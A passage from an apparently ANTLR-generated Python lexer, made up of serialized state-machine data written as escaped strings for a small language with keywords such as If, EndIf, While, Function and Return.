buf.write(\"\\16\\t\\u00e1\\3\\t\\3\\t\\5\\t\\u00e6\\n\\t\\3\\t\\5\\t\\u00e9\\n\\t\\3\")\n buf.write(\"\\n\\3\\n\\3\\n\\3\\13\\3\\13\\3\\13\\3\\f\\3\\f\\3\\f\\3\\r\\3\\r\\3\\r\\5\\r\")\n buf.write(\"\\u00f7\\n\\r\\3\\16\\3\\16\\3\\17\\3\\17\\3\\20\\3\\20\\3\\20\\3\\20\\5\\20\")\n buf.write(\"\\u0101\\n\\20\\3\\20\\3\\20\\7\\20\\u0105\\n\\20\\f\\20\\16\\20\\u0108\")\n buf.write(\"\\13\\20\\3\\21\\3\\21\\3\\21\\7\\21\\u010d\\n\\21\\f\\21\\16\\21\\u0110\")\n buf.write(\"\\13\\21\\5\\21\\u0112\\n\\21\\3\\22\\3\\22\\3\\22\\3\\22\\5\\22\\u0118\")\n buf.write(\"\\n\\22\\3\\22\\3\\22\\7\\22\\u011c\\n\\22\\f\\22\\16\\22\\u011f\\13\\22\")\n buf.write(\"\\3\\23\\3\\23\\3\\23\\5\\23\\u0124\\n\\23\\3\\24\\3\\24\\3\\25\\3\\25\\5\")\n buf.write(\"\\25\\u012a\\n\\25\\3\\26\\3\\26\\7\\26\\u012e\\n\\26\\f\\26\\16\\26\\u0131\")\n buf.write(\"\\13\\26\\3\\26\\3\\26\\3\\26\\3\\27\\3\\27\\3\\27\\3\\27\\3\\27\\3\\30\\3\")\n buf.write(\"\\30\\3\\30\\3\\30\\3\\30\\3\\30\\3\\31\\3\\31\\3\\31\\3\\31\\3\\31\\3\\31\")\n buf.write(\"\\3\\31\\3\\31\\3\\31\\3\\32\\3\\32\\3\\32\\3\\33\\3\\33\\3\\33\\3\\33\\3\\33\")\n buf.write(\"\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\35\\3\\35\\3\\35\\3\\35\")\n buf.write(\"\\3\\35\\3\\35\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\37\")\n buf.write(\"\\3\\37\\3\\37\\3\\37\\3\\37\\3\\37\\3\\37\\3 \\3 \\3 \\3 \\3 \\3 \\3 \\3\")\n buf.write(\" \\3 \\3!\\3!\\3!\\3!\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\")\n buf.write(\"#\\3#\\3#\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3%\\3%\\3%\\3%\\3%\\3\")\n buf.write(\"%\\3%\\3&\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\\'\\3\\'\\3(\\3(\\3(\\3(\\3(\\3(\")\n buf.write(\"\\3)\\3)\\3)\\3)\\3)\\3*\\3*\\3*\\3*\\3*\\3*\\3+\\3+\\3+\\3+\\3+\\3+\\3\")\n buf.write(\",\\3,\\3-\\3-\\3-\\3.\\3.\\3/\\3/\\3/\\3\\60\\3\\60\\3\\61\\3\\61\\3\\61\")\n buf.write(\"\\3\\62\\3\\62\\3\\63\\3\\63\\3\\63\\3\\64\\3\\64\\3\\64\\3\\65\\3\\65\\3\\66\")\n buf.write(\"\\3\\66\\3\\66\\3\\67\\3\\67\\3\\67\\38\\38\\38\\39\\39\\39\\3:\\3:\\3;\\3\")\n buf.write(\";\\3<\\3<\\3<\\3=\\3=\\3=\\3>\\3>\\3>\\3>\\3?\\3?\\3?\\3@\\3@\\3@\\3A\\3\")\n buf.write(\"A\\3A\\3A\\3B\\3B\\3B\\3B\\3C\\3C\\3D\\3D\\3E\\3E\\3F\\3F\\3G\\3G\\3H\\3\")\n buf.write(\"H\\3I\\3I\\3J\\3J\\3K\\3K\\3L\\3L\\3M\\3M\\3N\\3N\\3O\\3O\\3O\\3O\\3O\\3\")\n buf.write(\"O\\3O\\3O\\3O\\3O\\3O\\3O\\3O\\3P\\3P\\3P\\3P\\3P\\3P\\3P\\3P\\3P\\3P\\3\")\n buf.write(\"P\\3P\\3P\\3P\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3Q\\3R\\3\")\n buf.write(\"R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3R\\3S\\3S\\3S\\3\")\n buf.write(\"S\\3S\\3S\\3S\\3S\\3S\\3S\\3S\\3S\\3S\\3S\\3S\\3T\\3T\\3T\\3T\\3T\\3T\\3\")\n buf.write(\"T\\3T\\3T\\3T\\3T\\3T\\3T\\3T\\3T\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3U\\3\")\n buf.write(\"U\\3U\\3U\\3U\\3U\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3V\\3\")\n buf.write(\"V\\3V\\3V\\3W\\3W\\3W\\3W\\7W\\u0289\\nW\\fW\\16W\\u028c\\13W\\3W\\3\")\n buf.write(\"W\\3W\\3W\\3W\\3X\\6X\\u0294\\nX\\rX\\16X\\u0295\\3X\\3X\\3Y\\3Y\\7Y\")\n buf.write(\"\\u029c\\nY\\fY\\16Y\\u029f\\13Y\\3Y\\3Y\\3Y\\3Z\\3Z\\7Z\\u02a6\\nZ\")\n buf.write(\"\\fZ\\16Z\\u02a9\\13Z\\3Z\\5Z\\u02ac\\nZ\\3Z\\3Z\\3[\\3[\\3[\\3[\\3[\")\n buf.write(\"\\3[\\7[\\u02b6\\n[\\f[\\16[\\u02b9\\13[\\3[\\3[\\3\\\\\\3\\\\\\4\\u028a\")\n buf.write(\"\\u02b7\\2]\\3\\3\\5\\2\\7\\2\\t\\2\\13\\2\\r\\2\\17\\2\\21\\2\\23\\2\\25\\2\")\n buf.write(\"\\27\\2\\31\\2\\33\\2\\35\\2\\37\\2!\\2#\\2%\\4\\'\\5)\\6+\\7-\\b/\\t\\61\")\n buf.write(\"\\n\\63\\13\\65\\f\\67\\r9\\16;\\17=\\20?\\21A\\22C\\23E\\24G\\25I\\26\")\n buf.write(\"K\\27M\\30O\\31Q\\32S\\33U\\34W\\35Y\\36[\\37] _!a\\\"c#e$g%i&k\\'\")\n buf.write(\"m(o)q*s+u,w-y.{/}\\60\\177\\61\\u0081\\62\\u0083\\63\\u0085\\64\")\n buf.write(\"\\u0087\\65\\u0089\\66\\u008b\\67\\u008d8\\u008f9\\u0091:\\u0093\")\n buf.write(\";\\u0095<\\u0097=\\u0099>\\u009b?\\u009d@\\u009fA\\u00a1B\\u00a3\")\n buf.write(\"C\\u00a5D\\u00a7E\\u00a9F\\u00abG\\u00adH\\u00afI\\u00b1J\\u00b3\")\n buf.write(\"K\\u00b5L\\u00b7M\\3\\2\\22\\3\\2c|\\3\\2C\\\\\\3\\2\\62;\\4\\2GGgg\\3\")\n buf.write(\"\\2\\60\\60\\t\\2))^^ddhhppttvv\\7\\2\\n\\f\\16\\17$$))^^\\5\\2\\62\")\n buf.write(\";CHch\\3\\2\\629\\5\\2\\63;CHch\\3\\2\\62\\62\\3\\2\\63;\\3\\2\\639\\5\")\n buf.write(\"\\2\\13\\f\\16\\17\\\"\\\"\\4\\3\\n\\f\\16\\17\\3\\2,,\\2\\u02cb\\2\\3\\3\\2\")\n buf.write(\"\\2\\2\\2%\\3\\2\\2\\2\\2\\'\\3\\2\\2\\2\\2)\\3\\2\\2\\2\\2+\\3\\2\\2\\2\\2-\\3\")\n buf.write(\"\\2\\2\\2\\2/\\3\\2\\2\\2\\2\\61\\3\\2\\2\\2\\2\\63\\3\\2\\2\\2\\2\\65\\3\\2\\2\")\n buf.write(\"\\2\\2\\67\\3\\2\\2\\2\\29\\3\\2\\2\\2\\2;\\3\\2\\2\\2\\2=\\3\\2\\2\\2\\2?\\3\")\n buf.write(\"\\2\\2\\2\\2A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\")\n buf.write(\"\\3\\2\\2\\2\\2K\\3\\2\\2\\2\\2M\\3\\2\\2\\2\\2O\\3\\2\\2\\2\\2Q\\3\\2\\2\\2\\2\")\n buf.write(\"S\\3\\2\\2\\2\\2U\\3\\2\\2\\2\\2W\\3\\2\\2\\2\\2Y\\3\\2\\2\\2\\2[\\3\\2\\2\\2\")\n buf.write(\"\\2]\\3\\2\\2\\2\\2_\\3\\2\\2\\2\\2a\\3\\2\\2\\2\\2c\\3\\2\\2\\2\\2e\\3\\2\\2\")\n buf.write(\"\\2\\2g\\3\\2\\2\\2\\2i\\3\\2\\2\\2\\2k\\3\\2\\2\\2\\2m\\3\\2\\2\\2\\2o\\3\\2\")\n buf.write(\"\\2\\2\\2q\\3\\2\\2\\2\\2s\\3\\2\\2\\2\\2u\\3\\2\\2\\2\\2w\\3\\2\\2\\2\\2y\\3\")\n buf.write(\"\\2\\2\\2\\2{\\3\\2\\2\\2\\2}\\3\\2\\2\\2\\2\\177\\3\\2\\2\\2\\2\\u0081\\3\\2\")\n buf.write(\"\\2\\2\\2\\u0083\\3\\2\\2\\2\\2\\u0085\\3\\2\\2\\2\\2\\u0087\\3\\2\\2\\2\\2\")\n buf.write(\"\\u0089\\3\\2\\2\\2\\2\\u008b\\3\\2\\2\\2\\2\\u008d\\3\\2\\2\\2\\2\\u008f\")\n buf.write(\"\\3\\2\\2\\2\\2\\u0091\\3\\2\\2\\2\\2\\u0093\\3\\2\\2\\2\\2\\u0095\\3\\2\\2\")\n buf.write(\"\\2\\2\\u0097\\3\\2\\2\\2\\2\\u0099\\3\\2\\2\\2\\2\\u009b\\3\\2\\2\\2\\2\\u009d\")\n buf.write(\"\\3\\2\\2\\2\\2\\u009f\\3\\2\\2\\2\\2\\u00a1\\3\\2\\2\\2\\2\\u00a3\\3\\2\\2\")\n buf.write(\"\\2\\2\\u00a5\\3\\2\\2\\2\\2\\u00a7\\3\\2\\2\\2\\2\\u00a9\\3\\2\\2\\2\\2\\u00ab\")\n buf.write(\"\\3\\2\\2\\2\\2\\u00ad\\3\\2\\2\\2\\2\\u00af\\3\\2\\2\\2\\2\\u00b1\\3\\2\\2\")\n buf.write(\"\\2\\2\\u00b3\\3\\2\\2\\2\\2\\u00b5\\3\\2\\2\\2\\2\\u00b7\\3\\2\\2\\2\\3\\u00b9\")\n buf.write(\"\\3\\2\\2\\2\\5\\u00c3\\3\\2\\2\\2\\7\\u00c5\\3\\2\\2\\2\\t\\u00c7\\3\\2\\2\")\n buf.write(\"\\2\\13\\u00cb\\3\\2\\2\\2\\r\\u00cd\\3\\2\\2\\2\\17\\u00d7\\3\\2\\2\\2\\21\")\n buf.write(\"\\u00df\\3\\2\\2\\2\\23\\u00ea\\3\\2\\2\\2\\25\\u00ed\\3\\2\\2\\2\\27\\u00f0\")\n buf.write(\"\\3\\2\\2\\2\\31\\u00f6\\3\\2\\2\\2\\33\\u00f8\\3\\2\\2\\2\\35\\u00fa\\3\")\n buf.write(\"\\2\\2\\2\\37\\u0100\\3\\2\\2\\2!\\u0111\\3\\2\\2\\2#\\u0117\\3\\2\\2\\2\")\n buf.write(\"%\\u0123\\3\\2\\2\\2\\'\\u0125\\3\\2\\2\\2)\\u0129\\3\\2\\2\\2+\\u012b\")\n buf.write(\"\\3\\2\\2\\2-\\u0135\\3\\2\\2\\2/\\u013a\\3\\2\\2\\2\\61\\u0140\\3\\2\\2\")\n buf.write(\"\\2\\63\\u0149\\3\\2\\2\\2\\65\\u014c\\3\\2\\2\\2\\67\\u0151\\3\\2\\2\\2\")\n buf.write(\"9\\u0158\\3\\2\\2\\2;\\u015e\\3\\2\\2\\2=\\u0166\\3\\2\\2\\2?\\u016d\\3\")\n buf.write(\"\\2\\2\\2A\\u0176\\3\\2\\2\\2C\\u017a\\3\\2\\2\\2E\\u0183\\3\\2\\2\\2G\\u0186\")\n buf.write(\"\\3\\2\\2\\2I\\u0190\\3\\2\\2\\2K\\u0197\\3\\2\\2\\2M\\u019c\\3\\2\\2\\2\")\n buf.write(\"O\\u01a0\\3\\2\\2\\2Q\\u01a6\\3\\2\\2\\2S\\u01ab\\3\\2\\2\\2U\\u01b1\\3\")\n buf.write(\"\\2\\2\\2W\\u01b7\\3\\2\\2\\2Y\\u01b9\\3\\2\\2\\2[\\u01bc\\3\\2\\2\\2]\\u01be\")\n buf.write(\"\\3\\2\\2\\2_\\u01c1\\3\\2\\2\\2a\\u01c3\\3\\2\\2\\2c\\u01c6\\3\\2\\2\\2\")\n buf.write(\"e\\u01c8\\3\\2\\2\\2g\\u01cb\\3\\2\\2\\2i\\u01ce\\3\\2\\2\\2k\\u01d0\\3\")\n buf.write(\"\\2\\2\\2m\\u01d3\\3\\2\\2\\2o\\u01d6\\3\\2\\2\\2q\\u01d9\\3\\2\\2\\2s\\u01dc\")\n buf.write(\"\\3\\2\\2\\2u\\u01de\\3\\2\\2\\2w\\u01e0\\3\\2\\2\\2y\\u01e3\\3\\2\\2\\2\")\n buf.write(\"{\\u01e6\\3\\2\\2\\2}\\u01ea\\3\\2\\2\\2\\177\\u01ed\\3\\2\\2\\2\\u0081\")\n buf.write(\"\\u01f0\\3\\2\\2\\2\\u0083\\u01f4\\3\\2\\2\\2\\u0085\\u01f8\\3\\2\\2\\2\")\n buf.write(\"\\u0087\\u01fa\\3\\2\\2\\2\\u0089\\u01fc\\3\\2\\2\\2\\u008b\\u01fe\\3\")\n buf.write(\"\\2\\2\\2\\u008d\\u0200\\3\\2\\2\\2\\u008f\\u0202\\3\\2\\2\\2\\u0091\\u0204\")\n buf.write(\"\\3\\2\\2\\2\\u0093\\u0206\\3\\2\\2\\2\\u0095\\u0208\\3\\2\\2\\2\\u0097\")\n buf.write(\"\\u020a\\3\\2\\2\\2\\u0099\\u020c\\3\\2\\2\\2\\u009b\\u020e\\3\\2\\2\\2\")\n buf.write(\"\\u009d\\u0210\\3\\2\\2\\2\\u009f\\u021d\\3\\2\\2\\2\\u00a1\\u022b\\3\")\n buf.write(\"\\2\\2\\2\\u00a3\\u0238\\3\\2\\2\\2\\u00a5\\u0248\\3\\2\\2\\2\\u00a7\\u0257\")\n buf.write(\"\\3\\2\\2\\2\\u00a9\\u0266\\3\\2\\2\\2\\u00ab\\u0274\\3\\2\\2\\2\\u00ad\")\n buf.write(\"\\u0284\\3\\2\\2\\2\\u00af\\u0293\\3\\2\\2\\2\\u00b1\\u0299\\3\\2\\2\\2\")\n buf.write(\"\\u00b3\\u02a3\\3\\2\\2\\2\\u00b5\\u02af\\3\\2\\2\\2\\u00b7\\u02bc\\3\")\n buf.write(\"\\2\\2\\2\\u00b9\\u00c0\\5\\5\\3\\2\\u00ba\\u00bf\\5\\5\\3\\2\\u00bb\\u00bf\")\n buf.write(\"\\5\\t\\5\\2\\u00bc\\u00bf\\5\\7\\4\\2\\u00bd\\u00bf\\7a\\2\\2\\u00be\")\n buf.write(\"\\u00ba\\3\\2\\2\\2\\u00be\\u00bb\\3\\2\\2\\2\\u00be\\u00bc\\3\\2\\2\\2\")\n buf.write(\"\\u00be\\u00bd\\3\\2\\2\\2\\u00bf\\u00c2\\3\\2\\2\\2\\u00c0\\u00be\\3\")\n buf.write(\"\\2\\2\\2\\u00c0\\u00c1\\3\\2\\2\\2\\u00c1\\4\\3\\2\\2\\2\\u00c2\\u00c0\")\n buf.write(\"\\3\\2\\2\\2\\u00c3\\u00c4\\t\\2\\2\\2\\u00c4\\6\\3\\2\\2\\2\\u00c5\\u00c6\")\n buf.write(\"\\t\\3\\2\\2\\u00c6\\b\\3\\2\\2\\2\\u00c7\\u00c8\\t\\4\\2\\2\\u00c8\\n\\3\")\n buf.write(\"\\2\\2\\2\\u00c9\\u00cc\\5\\5\\3\\2\\u00ca\\u00cc\\5\\7\\4\\2\\u00cb\\u00c9\")\n buf.write(\"\\3\\2\\2\\2\\u00cb\\u00ca\\3\\2\\2\\2\\u00cc\\f\\3\\2\\2\\2\\u00cd\\u00d0\")\n buf.write(\"\\t\\5\\2\\2\\u00ce\\u00d1\\5[.\\2\\u00cf\\u00d1\\5W,\\2\\u00d0\\u00ce\")\n buf.write(\"\\3\\2\\2\\2\\u00d0\\u00cf\\3\\2\\2\\2\\u00d0\\u00d1\\3\\2\\2\\2\\u00d1\")\n buf.write(\"\\u00d3\\3\\2\\2\\2\\u00d2\\u00d4\\5\\t\\5\\2\\u00d3\\u00d2\\3\\2\\2\\2\")\n buf.write(\"\\u00d4\\u00d5\\3\\2\\2\\2\\u00d5\\u00d3\\3\\2\\2\\2\\u00d5\\u00d6\\3\")\n buf.write(\"\\2\\2\\2\\u00d6\\16\\3\\2\\2\\2\\u00d7\\u00db\\t\\6\\2\\2\\u00d8\\u00da\")\n buf.write(\"\\5\\t\\5\\2\\u00d9\\u00d8\\3\\2\\2\\2\\u00da\\u00dd\\3\\2\\2\\2\\u00db\")\n buf.write(\"\\u00d9\\3\\2\\2\\2\\u00db\\u00dc\\3\\2\\2\\2\\u00dc\\20\\3\\2\\2\\2\\u00dd\")\n buf.write(\"\\u00db\\3\\2\\2\\2\\u00de\\u00e0\\5\\t\\5\\2\\u00df\\u00de\\3\\2\\2\\2\")\n buf.write(\"\\u00e0\\u00e1\\3\\2\\2\\2\\u00e1\\u00df\\3\\2\\2\\2\\u00e1\\u00e2\\3\")\n buf.write(\"\\2\\2\\2\\u00e2\\u00e8\\3\\2\\2\\2\\u00e3\\u00e5\\5\\17\\b\\2\\u00e4\")\n buf.write(\"\\u00e6\\5\\r\\7\\2\\u00e5\\u00e4\\3\\2\\2\\2\\u00e5\\u00e6\\3\\2\\2\\2\")\n buf.write(\"\\u00e6\\u00e9\\3\\2\\2\\2\\u00e7\\u00e9\\5\\r\\7\\2\\u00e8\\u00e3\\3\")\n buf.write(\"\\2\\2\\2\\u00e8\\u00e7\\3\\2\\2\\2\\u00e9\\22\\3\\2\\2\\2\\u00ea\\u00eb\")\n buf.write(\"\\7^\\2\\2\\u00eb\\u00ec\\n\\7\\2\\2\\u00ec\\24\\3\\2\\2\\2\\u00ed\\u00ee\")\n buf.write(\"\\7^\\2\\2\\u00ee\\u00ef\\t\\7\\2\\2\\u00ef\\26\\3\\2\\2\\2\\u00f0\\u00f1\")\n buf.write(\"\\7)\\2\\2\\u00f1\\u00f2\\7$\\2\\2\\u00f2\\30\\3\\2\\2\\2\\u00f3\\u00f7\")\n buf.write(\"\\n\\b\\2\\2\\u00f4\\u00f7\\5\\25\\13\\2\\u00f5\\u00f7\\5\\27\\f\\2\\u00f6\")\n buf.write(\"\\u00f3\\3\\2\\2\\2\\u00f6\\u00f4\\3\\2\\2\\2\\u00f6\\u00f5\\3\\2\\2\\2\")\n buf.write(\"\\u00f7\\32\\3\\2\\2\\2\\u00f8\\u00f9\\t\\t\\2\\2\\u00f9\\34\\3\\2\\2\\2\")\n buf.write(\"\\u00fa\\u00fb\\t\\n\\2\\2\\u00fb\\36\\3\\2\\2\\2\\u00fc\\u00fd\\7\\62\")\n buf.write(\"\\2\\2\\u00fd\\u0101\\7z\\2\\2\\u00fe\\u00ff\\7\\62\\2\\2\\u00ff\\u0101\")\n buf.write(\"\\7Z\\2\\2\\u0100\\u00fc\\3\\2\\2\\2\\u0100\\u00fe\\3\\2\\2\\2\\u0101\")\n buf.write(\"\\u0102\\3\\2\\2\\2\\u0102\\u0106\\t\\13\\2\\2\\u0103\\u0105\\5\\33\\16\")\n buf.write(\"\\2\\u0104\\u0103\\3\\2\\2\\2\\u0105\\u0108\\3\\2\\2\\2\\u0106\\u0104\")\n buf.write(\"\\3\\2\\2\\2\\u0106\\u0107\\3\\2\\2\\2\\u0107 \\3\\2\\2\\2\\u0108\\u0106\")\n buf.write(\"\\3\\2\\2\\2\\u0109\\u0112\\t\\f\\2\\2\\u010a\\u010e\\t\\r\\2\\2\\u010b\")\n buf.write(\"\\u010d\\t\\4\\2\\2\\u010c\\u010b\\3\\2\\2\\2\\u010d\\u0110\\3\\2\\2\\2\")\n buf.write(\"\\u010e\\u010c\\3\\2\\2\\2\\u010e\\u010f\\3\\2\\2\\2\\u010f\\u0112\\3\")\n buf.write(\"\\2\\2\\2\\u0110\\u010e\\3\\2\\2\\2\\u0111\\u0109\\3\\2\\2\\2\\u0111\\u010a\")\n buf.write(\"\\3\\2\\2\\2\\u0112\\\"\\3\\2\\2\\2\\u0113\\u0114\\7\\62\\2\\2\\u0114\\u0118\")\n buf.write(\"\\7q\\2\\2\\u0115\\u0116\\7\\62\\2\\2\\u0116\\u0118\\7Q\\2\\2\\u0117\")\n buf.write(\"\\u0113\\3\\2\\2\\2\\u0117\\u0115\\3\\2\\2\\2\\u0118\\u0119\\3\\2\\2\\2\")\n buf.write(\"\\u0119\\u011d\\t\\16\\2\\2\\u011a\\u011c\\5\\35\\17\\2\\u011b\\u011a\")\n buf.write(\"\\3\\2\\2\\2\\u011c\\u011f\\3\\2\\2\\2\\u011d\\u011b\\3\\2\\2\\2\\u011d\")\n buf.write(\"\\u011e\\3\\2\\2\\2\\u011e$\\3\\2\\2\\2\\u011f\\u011d\\3\\2\\2\\2\\u0120\")\n buf.write(\"\\u0124\\5!\\21\\2\\u0121\\u0124\\5\\37\\20\\2\\u0122\\u0124\\5#\\22\")\n buf.write(\"\\2\\u0123\\u0120\\3\\2\\2\\2\\u0123\\u0121\\3\\2\\2\\2\\u0123\\u0122\")\n buf.write(\"\\3\\2\\2\\2\\u0124&\\3\\2\\2\\2\\u0125\\u0126\\5\\21\\t\\2\\u0126(\\3\")\n buf.write(\"\\2\\2\\2\\u0127\\u012a\\5Q)\\2\\u0128\\u012a\\5S*\\2\\u0129\\u0127\")\n buf.write(\"\\3\\2\\2\\2\\u0129\\u0128\\3\\2\\2\\2\\u012a*\\3\\2\\2\\2\\u012b\\u012f\")\n buf.write(\"\\5\\u009bN\\2\\u012c\\u012e\\5\\31\\r\\2\\u012d\\u012c\\3\\2\\2\\2\\u012e\")\n buf.write(\"\\u0131\\3\\2\\2\\2\\u012f\\u012d\\3\\2\\2\\2\\u012f\\u0130\\3\\2\\2\\2\")\n buf.write(\"\\u0130\\u0132\\3\\2\\2\\2\\u0131\\u012f\\3\\2\\2\\2\\u0132\\u0133\\5\")\n buf.write(\"\\u009bN\\2\\u0133\\u0134\\b\\26\\2\\2\\u0134,\\3\\2\\2\\2\\u0135\\u0136\")\n buf.write(\"\\7D\\2\\2\\u0136\\u0137\\7q\\2\\2\\u0137\\u0138\\7f\\2\\2\\u0138\\u0139\")\n buf.write(\"\\7{\\2\\2\\u0139.\\3\\2\\2\\2\\u013a\\u013b\\7D\\2\\2\\u013b\\u013c\")\n buf.write(\"\\7t\\2\\2\\u013c\\u013d\\7g\\2\\2\\u013d\\u013e\\7c\\2\\2\\u013e\\u013f\")\n buf.write(\"\\7m\\2\\2\\u013f\\60\\3\\2\\2\\2\\u0140\\u0141\\7E\\2\\2\\u0141\\u0142\")\n buf.write(\"\\7q\\2\\2\\u0142\\u0143\\7p\\2\\2\\u0143\\u0144\\7v\\2\\2\\u0144\\u0145\")\n buf.write(\"\\7k\\2\\2\\u0145\\u0146\\7p\\2\\2\\u0146\\u0147\\7w\\2\\2\\u0147\\u0148\")\n buf.write(\"\\7g\\2\\2\\u0148\\62\\3\\2\\2\\2\\u0149\\u014a\\7F\\2\\2\\u014a\\u014b\")\n buf.write(\"\\7q\\2\\2\\u014b\\64\\3\\2\\2\\2\\u014c\\u014d\\7G\\2\\2\\u014d\\u014e\")\n buf.write(\"\\7n\\2\\2\\u014e\\u014f\\7u\\2\\2\\u014f\\u0150\\7g\\2\\2\\u0150\\66\")\n buf.write(\"\\3\\2\\2\\2\\u0151\\u0152\\7G\\2\\2\\u0152\\u0153\\7n\\2\\2\\u0153\\u0154\")\n buf.write(\"\\7u\\2\\2\\u0154\\u0155\\7g\\2\\2\\u0155\\u0156\\7K\\2\\2\\u0156\\u0157\")\n buf.write(\"\\7h\\2\\2\\u01578\\3\\2\\2\\2\\u0158\\u0159\\7G\\2\\2\\u0159\\u015a\")\n buf.write(\"\\7p\\2\\2\\u015a\\u015b\\7f\\2\\2\\u015b\\u015c\\7K\\2\\2\\u015c\\u015d\")\n buf.write(\"\\7h\\2\\2\\u015d:\\3\\2\\2\\2\\u015e\\u015f\\7G\\2\\2\\u015f\\u0160\")\n buf.write(\"\\7p\\2\\2\\u0160\\u0161\\7f\\2\\2\\u0161\\u0162\\7D\\2\\2\\u0162\\u0163\")\n buf.write(\"\\7q\\2\\2\\u0163\\u0164\\7f\\2\\2\\u0164\\u0165\\7{\\2\\2\\u0165<\\3\")\n buf.write(\"\\2\\2\\2\\u0166\\u0167\\7G\\2\\2\\u0167\\u0168\\7p\\2\\2\\u0168\\u0169\")\n buf.write(\"\\7f\\2\\2\\u0169\\u016a\\7H\\2\\2\\u016a\\u016b\\7q\\2\\2\\u016b\\u016c\")\n buf.write(\"\\7t\\2\\2\\u016c>\\3\\2\\2\\2\\u016d\\u016e\\7G\\2\\2\\u016e\\u016f\")\n buf.write(\"\\7p\\2\\2\\u016f\\u0170\\7f\\2\\2\\u0170\\u0171\\7Y\\2\\2\\u0171\\u0172\")\n buf.write(\"\\7j\\2\\2\\u0172\\u0173\\7k\\2\\2\\u0173\\u0174\\7n\\2\\2\\u0174\\u0175\")\n buf.write(\"\\7g\\2\\2\\u0175@\\3\\2\\2\\2\\u0176\\u0177\\7H\\2\\2\\u0177\\u0178\")\n buf.write(\"\\7q\\2\\2\\u0178\\u0179\\7t\\2\\2\\u0179B\\3\\2\\2\\2\\u017a\\u017b\")\n buf.write(\"\\7H\\2\\2\\u017b\\u017c\\7w\\2\\2\\u017c\\u017d\\7p\\2\\2\\u017d\\u017e\")\n buf.write(\"\\7e\\2\\2\\u017e\\u017f\\7v\\2\\2\\u017f\\u0180\\7k\\2\\2\\u0180\\u0181\")\n buf.write(\"\\7q\\2\\2\\u0181\\u0182\\7p\\2\\2\\u0182D\\3\\2\\2\\2\\u0183\\u0184\")\n buf.write(\"\\7K\\2\\2\\u0184\\u0185\\7h\\2\\2\\u0185F\\3\\2\\2\\2\\u0186\\u0187\")\n buf.write(\"\\7R\\2\\2\\u0187\\u0188\\7c\\2\\2\\u0188\\u0189\\7t\\2\\2\\u0189\\u018a\")\n buf.write(\"\\7c\\2\\2\\u018a\\u018b\\7o\\2\\2\\u018b\\u018c\\7g\\2\\2\\u018c\\u018d\")\n buf.write(\"\\7v\\2\\2\\u018d\\u018e\\7g\\2\\2\\u018e\\u018f\\7t\\2\\2\\u018fH\\3\")\n buf.write(\"\\2\\2\\2\\u0190\\u0191\\7T\\2\\2\\u0191\\u0192\\7g\\2\\2\\u0192\\u0193\")\n buf.write(\"\\7v\\2\\2\\u0193\\u0194\\7w\\2\\2\\u0194\\u0195\\7t\\2\\2\\u0195\\u0196\")\n buf.write(\"\\7p\\2\\2\\u0196J\\3\\2\\2\\2\\u0197\\u0198\\7V\\2\\2\\u0198\\u0199\")\n buf.write(\"\\7j\\2\\2\\u0199\\u019a\\7g\\2\\2\\u019a\\u019b\\7p\\2\\2\\u019bL\\3\")\n buf.write(\"\\2\\2\\2\\u019c\\u019d\\7X\\2\\2\\u019d\\u019e\\7c\\2\\2\\u019e\\u019f\")\n buf.write(\"\\7t\\2\\2\\u019fN\\3\\2\\2\\2\\u01a0\\u01a1\\7Y\\2\\2\\u01a1\\u01a2\")\n buf.write(\"\\7j\\2\\2\\u01a2\\u01a3\\7k\\2\\2\\u01a3\\u01a4\\7n\\2\\2\\u01a4\\u01a5\")\n buf.write(\"\\7g\\2\\2\\u01a5P\\3\\2\\2\\2\\u01a6\\u01a7\\7V\\2\\2\\u01a7\\u01a8\")\n buf.write(\"\\7t\\2\\2\\u01a8\\u01a9\\7w\\2\\2\\u01a9\\u01aa\\7g\\2\\2\\u01aaR\\3\")\n buf.write(\"\\2\\2\\2\\u01ab\\u01ac\\7H\\2\\2\\u01ac\\u01ad\\7c\\2\\2\\u01ad\\u01ae\")\n buf.write(\"\\7n\\2\\2\\u01ae\\u01af\\7u\\2\\2\\u01af\\u01b0\\7g\\2\\2\\u01b0T\\3\")\n buf.write(\"\\2\\2\\2\\u01b1\\u01b2\\7G\\2\\2\\u01b2\\u01b3\\7p\\2\\2\\u01b3\\u01b4\")\n buf.write(\"\\7f\\2\\2\\u01b4\\u01b5\\7F\\2\\2\\u01b5\\u01b6\\7q\\2\\2\\u01b6V\\3\")\n buf.write(\"\\2\\2\\2\\u01b7\\u01b8\\7-\\2\\2\\u01b8X\\3\\2\\2\\2\\u01b9\\u01ba\\7\")\n buf.write(\"-\\2\\2\\u01ba\\u01bb\\7\\60\\2\\2\\u01bbZ\\3\\2\\2\\2\\u01bc\\u01bd\")\n buf.write(\"\\7/\\2\\2\\u01bd\\\\\\3\\2\\2\\2\\u01be\\u01bf\\7/\\2\\2\\u01bf\\u01c0\")\n buf.write(\"\\7\\60\\2\\2\\u01c0^\\3\\2\\2\\2\\u01c1\\u01c2\\7,\\2\\2\\u01c2`\\3\\2\")\n buf.write(\"\\2\\2\\u01c3\\u01c4\\7,\\2\\2\\u01c4\\u01c5\\7\\60\\2\\2\\u01c5b\\3\")\n buf.write(\"\\2\\2\\2\\u01c6\\u01c7\\7^\\2\\2\\u01c7d\\3\\2\\2\\2\\u01c8\\u01c9\\7\")\n buf.write(\"^\\2\\2\\u01c9\\u01ca\\7\\60\\2\\2\\u01caf\\3\\2\\2\\2\\u01cb\\u01cc\")\n buf.write(\"\\7^\\2\\2\\u01cc\\u01cd\\7\\'\\2\\2\\u01cdh\\3\\2\\2\\2\\u01ce\\u01cf\")\n buf.write(\"\\7#\\2\\2\\u01cfj\\3\\2\\2\\2\\u01d0\\u01d1\\7(\\2\\2\\u01d1\\u01d2\")\n 